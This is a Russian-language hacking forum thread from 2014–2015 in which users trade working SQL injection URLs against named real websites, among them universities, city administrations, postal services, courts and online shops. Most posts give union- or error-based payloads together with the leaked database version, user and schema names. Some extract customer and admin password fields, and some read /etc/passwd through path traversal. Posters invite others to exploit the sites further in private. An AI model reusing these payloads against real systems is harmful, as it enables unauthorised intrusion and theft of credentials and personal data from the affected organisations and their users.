http://www.atlantic.edu/about/news/article.php?article=-991+union+select+1,user(),3,4,5,6,7,8,9,10,11,12
PR: 6
WallHack
20.08.2014, 20:46
Вывод где перечисления товаров
Code:
http://faunamarket.com/catalog.php?id=1%27+union+select+1,@@version+--+
5.1.73-cll
Яндекс тИЦ http://pr-cy.ru/static/img/yandex-bar/bar3.gif 50 Pr 1/10
Есть форум на phpbb3
http://55let.rudn.ru/i/U.png
Code:
http://55let.rudn.ru/news.php?id=-35+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7,8,9--
root@localhost:5.6.11
55 лет, а пишут дырявые движки.
Code:
http://www.tennis-piter.ru/pagerub.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--
Code:
5.1.63-0+squeeze1-log:z75741_portal@77.221.130.13:z75741_portal
Code:
http://www.businessownersideacafe.com/small_business_grants/winner.php?grant_id=-1+UNION+SELECT+user()+--+
PR: 6
Ничего интересного. Скулю вставил чтобы сообщение не считалось за флуд.
Господа, нужна консультация по скулям, инклудам и так дальше.
Совместное ковыряние жирных ссылок, которые не хотелось бы выкладывать в паблик. Если есть желающие - в ЛС, пожалуйста.
kingbeef
29.08.2014, 00:33
Code:
http://game.vietgiaitri.com/vui-nhon-12.vgt+and+(ExtractValue(1,concat(0x3a,user(),0x3a ,version(),0x3a,database())))
Code:
game@192.168.1.3:5.6.19:vietgia
Code:
http://www.unatech.org/pagerub.php?cat_id=-21+union+select+1,2,3,4,5,6,@@version,8,9--
Code:
5.1.56
DezMond™
04.09.2014, 19:08
PR8
http://pendientedemigracion.ucm.es/info/revesco/EdicionElectronica.php?IdRevista=-33+UnIoN/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/sELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+ from+TRUsuarios+--+
look2009
10.09.2014, 02:31
http://www.minambiente.gov.co/index.php?option=com_spidercalendar&calendar_id=1+union+select+1,version(),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18+--+
ninja96c
11.09.2014, 12:16
http://100bestschools.net/eng/school/?school=-80+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,version(),20,21,22,23,24--+
вывод в ошибке
kingbeef
11.09.2014, 13:41
Code:
http://mail.aaa.com.ua/news/18838.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1
5.5.38-0ubuntu0.12.04.1
Вывод в алерте.
DezMond™
13.09.2014, 12:23
http://archiv.jura.uni-saarland.de/entschdb/lagsaarland/dboutput.php?id=-42'+union+select+user(),2+--+
Code:
http://teleskop.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,File_Priv,4,5,6,7,8,9,10+from+m ysql.user--&Itemid=3227
mysql 5.0.45
file priv y
тиц 140 pr 3
Code:
http://www.asep7.gov.la/show.php?id=-15'+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2+--+
pr 5
WallHack
22.09.2014, 18:50
File Priv Y
Code:
http://border-terrier.ru/video.php?id=-11+union+select+1,File_Priv,3,4,5,6+from++mysql.us er--
Mysql 5.1.49-3
Тиц 20
Unknowhacker
23.09.2014, 01:30
Официальный сайт городского головы и городского совета г. Дoнeцкa
Code:
http://www.lukyanchenko.donetsk.ua/public_echo.php?id=122%27+union+select+1,2,version (),4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
Версия: 4.1.22-max-log
Code:
http://www.laobooking.com/city_destination.php?cid=-9%27+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4+--+
Специально для всех любителей футбола:
Seria B
Code:
http://www.asavellino.com/notizia.php?id=-7984+union+select+1,2,3,4,5,concat_ws(0x3a,version (),user(),database()),7,8--
Code:
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,@@version)--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,db_name())--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,user_name())--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+%20not+in+(%27Wallpaper%27)))--
Code:
http://www.livornocalcio.it/notizie/notizie.php?id=-9939+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11,12+--+
Code:
http://www.ternanacalcio.com/index.php?module=loadContenuto&id=5&padre=-28%27+AND+substring(@@version, 1, 1)=5
ну и как же без Seria A
Code:
http://www.hellasverona.it/scheda.php?id=-330'+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13+--+
http://legendsofbaseball.com/?cid=-1+union+select+1,2,3,@@version
DezMond™
07.10.2014, 17:43
PR7
http://www.destinationquebec.com/medias/section.php?section=01&sm=01&Langue=fr&cle_idee=-2986'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40+--+
kingbeef
10.10.2014, 11:52
http://www.vokrugsveta.ru/photo/location/11/?limit=2&sort=publish_date1+and(select+1+from(select+count( *),concat((select+concat_ws(0x3a,version(),user(), database())),floor(rand(0)*2))x+from+information_s chema.tables+group+by+x)a)--+g
5.0.86:vokrugsv@localhost:vokrugsv
Code:
http://transparencia.redsalud.gov.cl/transparencia/public/auditorias_historico.php?id=-9967'+UNION+SELECT+user()+--+
file_priv: Y
Code:
http://www.firstgulf.com/search-details.php?id=-59+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11+--+
Code:
http://www.dawnbooksupply.co.uk/product.php?id=-114+union+select+1,2,@@version,4+--+
CTRL+U -> смотрим строку 358 и видим ответ =
Code:
Code:
http://monicasantana.de/main.php?id=brautmode-kollektion-uebersicht&kollektion=-12%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+
look2009
23.10.2014, 07:25
Code:
http://www.prolink2u.com/new/products/print_prod.php?cid=75%27+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,concat_ws(0x3a,0x3a,0x3a,c ust_id,cust_fname,cust_lname,cust_city,cust_countr y,cust_dob,cust_email,cust_password,0x3a),17,18+fr om+tbcustinfo+--+
Code:
http://www.top15poker.com/news/category.php?cid=-2+union+select+1,@@version,3--
Индийский эпос Махабхарата
(CY) 10
(PR) 2
Code:
http://www.eraved.com.ua/mahabharata.php?id=-106%27+union+select+User(),2,version(),4,5--+
"Зимовье Зверей"
(CY) 350
(PR) 3
Code:
http://zzverey.spb.ru/list.php?id=23&text=-379+union+select+1,2,User(),version(),5,6--
University of Washington
PR: 6
тИЦ: 275
Code:
http://depts.washington.edu/trnews/wi06b/article.php?ar_id=-62+union+select+1,user(),3,4,5+--+
КП "Харьковские тепловые сети"
PR: 3
тИЦ: 60
Code:
http://www.hts.kharkov.ua/news_full.php?id=-17'+UNION+SELECT+1,2,user()+--+
University of London. Senate House Libraries
PR: 6
тИЦ: 10
Code:
http://w01.shlexternal.wf.ulcc.ac.uk/res/databases.php?id=-Law'+UNION+SELECT+1,user(),3,4,5,6,7+--+
New Jersey Institute of Technology. Computer Science Department
PR: 4
тИЦ: 30
Code:
http://web.njit.edu/cs/CS_Seminar/schedule.php?id=-243'+UNION+SELECT+1,database(),user(),version()+--+
University of Wisconsin-Madison. Waisman Center
PR: 7
тИЦ: 20
Code:
http://www.waisman.wisc.edu/cedd/events/details.php?id=415'+UNION+SELECT+1,2,3,user(),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30+--+
Code:
http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6--
Code:
[/c]
psihoz26
24.11.2014, 12:37
posbankusa.com
Code:
http://www.posbankusa.com/jboard/point-of-sale-support/notice.html?page=&job=content&Bcode=notice&board_idx=-3+union+select+1,2,3,4,5,concat(database(),0x3b,ve rsion()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+--+
version() - 5.1.67
HTML:
http://posbankcanada.com/jboard/point-of-sale-support/notice.html?page=&job=content&Bcode=notice&board_idx=-3+union+select+1,2,3,4,5,concat(database(),0x3b,ve rsion()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+--+
posbankusa;5.1.67
psihoz26
29.11.2014, 15:47
Code:
http://www.otido.ua/main.php?l=71+or(updatexml(1,c%6fncat(0x3a,user()) ,1))
version - 5.1.33
user - root@localhost
Code:
http://www.maestrosvault.com/search.php
'and(extractvalue(1,concat(0x3a,(SELECT adminPassword FROM admin))))and(1)='1
5
Code:
http://rechport-ykt.ru/uslugishow.php?i=-9+/*!12345union+select*/+1,2,version(),4,5,6
ver 4
Code:
http://www.frsky-rc.com/download/down.php?id=121+and(extractvalue(1,concat(0x3a,(se lect+column_name+from+information_schema.columns+w here+table_name=0x61646d696e+limit+5,1))))--+
5
Mamas Rezepte
PR: 3
тИЦ: 10
Code:
http://www.mamas-rezepte.de/drucken.php?rezept=-1458+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25+--+
IPA. Ruhr-Universität Bochum
PR: 6
тИЦ: 0
Code:
http://www.ipa.ruhr-uni-bochum.de/e/publik/litera/literaliste.php?refid=1912'+UNION+SELECT+1,user(), 3,4,5,6,7,8,9,10,11,12,13,14+--+
Национально-освободительное движение
тИЦ: 350
PR: 3
Трафик: 11к уников в день
Code:
http://rusnod.ru/poisk.php?tagz=11+UNION+SELECT+1,2+--+
Официальный сайт российской космической обсерватории ТЕСИС
тИЦ: 700
PR: 5
Code:
http://www.tesis.lebedev.ru/show_img.php?did=0+UNION+SELECT+1,2,3,4,5,6,user() ,8,9,10+--+
//1 сутки = 1 пост
Australian College of Pharmacy
Code:
http://www.acp.edu.au/image.php?id=1+union+select+1,2,3,concat_ws(0x3a,v ersion(),user(),database())--&output=tag
Australian Photographic Engineering Pty Ltd
Code:
http://www.aupassportphoto.com.au/category.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9--
Code:
http://shop.paintballshop.ee/article.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--&lang=est
Code:
http://www.sandwichglassmuseum.org/events.php?pgID=15+div(0)union(select(0),0,0,1,0,0 ,0,0,0,0,0,0,0,0,0,0)
file_priv Y
5.0.91
Code:
http://www.greyhighlands.ca/explore.php?pgid=207+div(0)union(select(1),2,3,4,5 ,6,7,8,9,10,11,12)--+
5.5
Иранский Фейсбук
Code:
http://iranfacebook.net/ticket/ticketa.php?user=-3'+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64,65,66,67,68,69,70,71,72+--+
Jamsho0T
11.12.2014, 04:38
Code:
http://www.geebeauty.com/toronto.php?page=Laser-Hair-Removal%27+/*!12345union*/+/*!12345select*/+1,2,3,version(),5,6+--+
5.5.40-MariaDB
PR 4
alexa 2,064,183
вывод в титуле
IKEA
Code:
http://midseasong.ikea.de/index.php?eh_pfad=-muenchen_eching'+union+select+1,2,3,user(),5,6,7,8 ,9,10+--+
Пачка каких-то русских сайтов:
Code:
http://humor.zooclub.ru/anekdots.php?id=-112+union+select+user(),2
Code:
http://fm01.ru/listen.php?post_id=-809'+union+select+1,2,user(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18+--+
Code:
http://bazatabletok.ru/instruktsiya-po-primeneniyu.php?id=-3034+union+select+1,user(),3,4,5,6,7,8,9,10+--+
Code:
http://www.gmsn.ru/object.php?sobj=-podolsk2'+union+select+1,user(),3,4,5,6,7,8,9,10,1 1,12,13,14,15+--+
Code:
http://strugi.ellink.ru/browse/show_news_type.php?r_id=-115+union+select+1,2,3,4,user(),6,7+--+
Code:
http://www.sex-leshiy.ru/sex_post.php?id=-184'+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),1 3,14,15,16+--+
Code:
http://volvo.autopassage.ru/index.php?id=-48'+union+select+1,2,3,4,5,6,database(),8,9,10,11, 12,13+--+
Code:
http://www.kapepa.ru/vivodvakansii1_cat2.php?cat2=-32'+union+select+1,2,user(),4,5,6+--+
Code:
http://www.forgun.ru/information.php?info_id=-9'+union+select+user())+--+
Code:
http://volvo.autopassage.ru/index.php?id=-48+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,13 +--+
Code:
http://www.kapepa.ru/vivodvakansii1_cat2.php?cat2=-32'+union+select+1,2,user(),4,5,6+--+
Code:
http://www.forgun.ru/information.php?info_id=-9'+union+select+user()+--+
Code:
http://forum.cleper.ru/answer.php?id=15'+union+select+1,2,user(),4,5,6+--+
Code:
http://yobiz.ru/view_post.php?id=-223э+union+select+1,2,3,user(),5,6,7,8,9,10+--+
Code:
http://residentevillive.ru/index.php?view=-289+union+select+1,user(),3,4,5,6+--+
Code:
http://www.avenued.com/europe/merchandise/index.php?ID=-48+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--
Jamsho0T
19.12.2014, 06:45
Code:
http://www.metall.kiev.ua/answer.php?id=-4423+UNION+SELECT+concat_ws(0x3,user(),version(),d atabase()),2
smirno1_smirnov@localhost� 5.5.35-33.0-log�s mirno1_metall
PR 1
YA 10
кто дальше раскрутит - напишите в пм )
тиц 120 пр 1 версия 5.5.30-30.2-log выводит в исходник
Code:
anabel.by/model.php?id=15860-1=0+union+select+(select+concat(0x7c,(anabel_users .id),0x7c,(anabel_users.name),0x7c,(anabel_users.p ass))+from+`goloveynikolaj1_anabel`.anabel_users+o rder+by+id+limit+3,1),700,700,700,700,700,700,700, 700,700,700,700,700,700,700,700,700,700,700,700 --+
5.1.73 версия Какой-то интересный магазинчик забугорный, берет карты палки и тд. Вывод в поле продукта
Code:
http://wexocom.com/wholesale.php?id=999999.9'+union+select+700,(selec t+concat(concat_ws(0x7c,users.id_user,users.userna me,users.password))+from+`dorofte542_wexocom`.user s+where+users.id_user=1),700,700,700,700,700,700,7 00,700,700,700,700,700,700,700,700,700,700,700,700 ,700,700,700,700,700,700,700,700,700,700+and+'x'=' x
5.1.56-log PR - 4 какой-то обыкновенный забугорный шоп
Code:
exaclair2.com/show_stores.php?id=99999.9'+union+select+900,(sele ct+concat(group_concat(table_name))+from+informati on_schema.tables+where+table_schema='buynow'),900 --+
тиц 220 пр 4 версия 5 всё достал, но админка анально огорожена. хотя, я может быть плохо пытался. и в форме отзывы хэсээс самые простые проходят.
Code:
http://jfc-club.spb.ru/news/news.php?id=999999.9+union+select+1,2,(select+conc at(concat_ws(0x7c,user.user_id,user.user_login,use r.user_password))+from+`st1352_jazznotes`.user+whe re+user.user_id=1),4,5,6,7,8--
шлак
Code:
http://comedycafe-dostavka.ru/index.php?id=999999.9'+union+select+777,777,777,(s elect+concat(concat_ws(0x7c,pass.id,pass.username, pass.password))+from+`comedycafe_bring`.pass+where +pass.id=1),777,777,777,777,777,777,777,777,777,77 7,777 -- x
Code:
http://dulevo-rus.ru/news/news.php?news_id=1+union+select+1,user(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18--
Code:
http://broddsweden.ru/publication/index.php?publicationtree_id=1%20and%20(select%201 %20from(select%20count(*),concat(version(),floor(r and(0)*2))x%20from%20information_schema.tables%20g roup%20by%20x)a);
Code:
http://www.dejavu28.ru/news.php?page_id=3&action=post&post_id=999999.9+union+all+select+1,2,3,4,user(),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
Code:
http://www.remax.net.pe/detalle_noticias.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14,15,16,17, 18--&lang=esp
Code:
http://www.humor.co.il/category.php?id=-61+union+select+1,2,3,4,5,6,7,8,CONCAT_WS%28CHAR%2 832,58,32%29,user%28%29,database%28%29,version%28% 29%29,10,11,12,13,14,15--
Anguilla Postal Service
Code:
http://www.aps.ai/newsstory.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--
5.1.73-cllostoffice@localhostost_office
Code:
http://www.swissvalley.com/news.cfm?id=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
PHP:
http://www.flexcart.com/members/elitefts/default.asp?m=CT&pid=-5105'+union+select+1,2,aes_decrypt(aes_encrypt(use r(),1),1),4,5,6,7,8,9,10,11,12,13,14,null,null,nul l,null,null,null,null,null,null,null+--+
Code:
http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Code:
http://www.dostihyjc.cz/kun.php?ID=40271;select+cast(version()+as+int)--+
postgresql 7, поиграйтесь
Code:
http://www.hohe-absaetze.de/shop/html/index.php?Cat=MULES-AND-SLIDES&POS=1&LandVal=US&sprache=29&DID=30 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16 --
Code:
http://www.maytech.fr/produit.php?id=-124+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9,10,11,12,13,14,15,16--
http://web.ufps.kemtel.ru/templates/logo.png
УФПС Кемеровской области - филиал ФГУП «Почта России»
Code:
http://web.ufps.kemtel.ru/index.php?page=news_pod&id=-561'+union+select+1,2,concat(user(),0x3a,version() ),4,5,6,7+--+
administrator@localhost:5.5.37-0ubuntu0.12.04.1
Code:
http://www.skydome.eu/professionnels/produits/fiche-produit.php?id=-11+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15--
Code:
http://www.inter-system.com.pl/tresc.php?id=60+and+1=cast(version()+as+int)--+
PostgreSQL 8.3.17
palec2006
27.01.2015, 03:34
http://www.meridian4.com/games/'+and(select+1+from(select+count(*),concat((select +(select+(select+version())+)+from+%60information_ schema%60.tables+limit+0,1),floor(rand(0)*2))x+fro m+%60information_schema%60.tables+group+by+x)a)+an d+'1'='1
ТИЦ:20
PR:4
SHA1
http://gazeta.comments.ua/?art=1342083260+and(select+1+from(select+count(*), concat((select+(select+(select+concat(0x27,0x7e,un hex(Hex(cast(version()+as+char))),0x7e,0x27)+from+ %60gazeta%60.cm_users+Order+by+pass+limit+8,1)+)+f rom+%60information_schema%60.tables+limit+0,1),flo or(rand(0)*2))x+from+%60information_schema%60.tabl es+group+by+x)a)+and+1%3D1
ТИЦ:300
PR:5
Code:
http://www.wlki.com/news.php?sb_news_id=-1'+union+select+1,2,3,4,5,6,user()29,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37+--+
swickbro_amy@localhost
Code:
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
УФПС Волгоградской области
- филиал ФГУП «Почта России»
5.1.53-log:root@localhost:ufps
Code:
http://wearisit.com/category.php?id=-2 union select 1,2,user(),4,5,6,7,8,9 --+
PR 2
Федеральные арбитражные суды Российской Федерации
тИЦ: 7000
PR: 6
Code:
http://calc.arbitr.ru/index.php?ac_id=-44'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,user(),19,20,21,22,23,24,25,26,27,28,29+--+
Пользуясь случаем - ищу работу. Писать в ЛС.
// Не путайте тиц основного домена с тиц поддоменов! YaBtr
// Там доступ и к основному домену! unic0rn
PR 1
Code:
http://http://www.safaripositano.com/catalogo/catalogo.php?a=0&tipo=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12+--+
DezMond™
03.02.2015, 20:41
PR7
http://www.lebenslanges-lernen.at/home/nationalagentur_lebenslanges_lernen/erasmus_hochschule/erasmus_oesterreich/berichte_praktikumsaufenthalt/?no_cache=1&tx_praktikumsbericht_pi1%5Bview%5D=selectHeiminst&tx_praktikumsbericht_pi1%5Bcity%5D=KREMS%22+union+ select+1,2+--+?no_cache=1&tx_praktikumsbericht_pi1%5Bview%5D=selectHeiminst
palec2006
06.02.2015, 00:56
http://eizvestia.com/info?inf_cat_id=and+extractvalue(1,concat(0x3a,(ve rsion())))and
Сайт вранья
ТИЦ:3000
PR:5
Alexa:21330
Траф:180к
admin_id:447
вк-профиль см:
wp_option.skylark_vk_admin_email, wp_option.skylark_vk_admin_password
----------------------------------
http://military-police.net/Marketplace/index.php?route=product/search&letter=-1'and+extractvalue(1,concat(0x3a,(select+version() )))and'
ТИЦ:20
PR:2
Opencart
op_pins
op_setting ->config_encryption
op_setting ->мыло->стим (+палка?)
Universidad de Guadalajara
Code:
http://www.gaceta.udg.mx/G_nota1.php?id=-14888%20UNION%20SELECT%201,2,3,4,5,6,7,@@version,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+
5.1.51
palec2006
08.02.2015, 06:05
http://visavis.ru/
Referer: 1'and+extractvalue(1,concat(0x3a,(version())))and'
5.5.40-MariaDB
вывод внизу страницы
Code:
http://cuct.ru/?page=-1'+union+select+1,2,3,version(),5,6,7,8+--+
5.5.30-30.2-log
В связи с большим количеством заказов, начинается конкурсный отбор на должность php-программиста в отдел разработок. Необходимые знания: HTML, PHP, MySQL, JavaScript.
Хочешь попасть в команду к профессионалам?
Mariano Moreno Instituto Superior
Code:
http://www.mariano-moreno.com.ar/index.php?put=novedad-amp&id=-1126+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7--
5.0.96-community:mm0233_sitionew@localhost:mm0233_sitione w
kingbeef
10.02.2015, 02:24
МПГУ
Code:
http://www.mpgu.edu/abiturientam/voprosy-po-postupleniyu/napravleniya_podgotovki_i_vstupitelnyye_ispytaniya _po_facultetam/?fac=inohhgfhfhgfhstr%27+and(select+1+from(select+ count(*),concat((select+table_name+from+informatio n_schema.tables+limit+0,1),floor(rand(0)*2))x+from +information_schema.tables+group+by+x)a)--+g
5.1.61-0ubuntu0.11.10.1
DezMond™
10.02.2015, 12:09
PR7
http://www.mdw.ac.at/mdwStreaming/onDemand.php?StueckID=-21'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,user(),18,19,20+--+
Люблю футбол))
Code:
http://www.koff.kz/readnews.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--
5.1.69-log:koff@localhost:futbol2014
palec2006
11.02.2015, 07:12
http://www.motorherz.ru/product.php?id=90009'+and+extractvalue(1,concat(0x 3a,(version())))and+'1'='1
винда
Санкт-Петербургская ЛГБТ Организация «Выход»
Code:
http://comingoutspb.com/ru/materialyi-po-proektu?project=1+and+updatexml(1,concat(0x3a,(sel ect concat(version(),0x3a,database()))),1)
XPATH syntax error: ':5.5.41-0+wheezy1:comingun_db1'
Code:
http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),user(),database()),9,10--
5.5.30:kanda@ikona.biz:kanda_kandadb
http://www.farmanager.com/img/title_light.png
Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14--
plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1
Админы оповещены.
MaxFast said:
http://www.farmanager.com/img/title_light.png
Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14--
plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1
Админы оповещены.
Баянчик
Пруфлинк /showpost.php?p=2483739&postcount=13493
Но оставим, другой сценарий.
Code:
http://actachemscand.dk/author.php?aid=-1126+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4--
5.1.63-0ubuntu0.11.04.1:acta@localhost:acta 4
palec2006
14.02.2015, 08:38
http://www.sportzone.ru/total/table.html?id=148+and+extractvalue(1,concat(0x3a,( version())))and+1=1
Тотализатор
ТИЦ:50
ЯК
кило трафа
в браузере редиректит
Code:
http://www.team221.com/order.php?cat=-3+union+select+concat_ws(0x3a,version(),user(),dat abase())--
http://rockbay.ru/img/main_logo.png
Code:
http://rockbay.ru/category/1?order_brend=1+and+extractvalue(1,concat(0x3a,(se lect+concat(version(),0x3a,database(),0x3a,user()) )))--
5.5.41-0ubuntu0.12.04.1:rockbay
Официальный сайт администрации города Ноябрьск
Code:
http://admnoyabrsk.ru/onenews.php?kat=-2211+UNION+ALL+SELECT 1,CONCAT(version(),0x3a,database(),0x3a,user())--&news=389
5.1.41-log:admnoyabrs_db:admnoyabrs_mysql@10.1.117.115
Администрация городского округа — город Волжский
Code:
http://www.admvol.ru/TopNews/podrobno.asp?id=5'+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.deenakastor.com/recipe_print.php?num=6' and 999999.9 union all select 1,2,concat(version(),0x3a,user()),4,5 and '1'='1
5.5.32-log:deenakastor@10.1.112.62
psihoz26
15.02.2015, 15:45
http://smart-elec.ru/noo.php?page1=506&page2=42&razdel=5&info=-163'+union+select+'
../../../../../../../../../../../../etc/hosts
',concat(version(),0x3a,user())+--+
5.5.35-33.0
u0967474_smart@localhost
Ситауация схожа с с третьим видео (https://antichat.live/threads/422072/)
и ещё одна
http://www.footystatcenter.com/center/index.php?userid=2747&lang=6+union+select+1,2,concat(0x2e2e2f2e2e2f2e2e2 f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6 574632f706173737764)+--+
под хексом /etc/passwd
Смотрим тег title
gold6583:*:9812875:100450:gold6583:/home/content/75/9812875:/sbin/nologin
suzanneriver:*:6698633:100450:suzanneriver:/home/content/33/6698633:/sbin/nologin
optienz:*:6022630:100450
ptienz:/home/content/30/6022630:/sbin/nologin
ursu2587:*:10016686:100450:ursu2587:/home/ *********
kingbeef
16.02.2015, 16:08
Code:
http://www.aaa-agro.com/news/536.html'*updatexml(1,concat(0x3A,version()),1)*'
Вывод в алерте
5.5.41-0ubuntu0.12.04
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot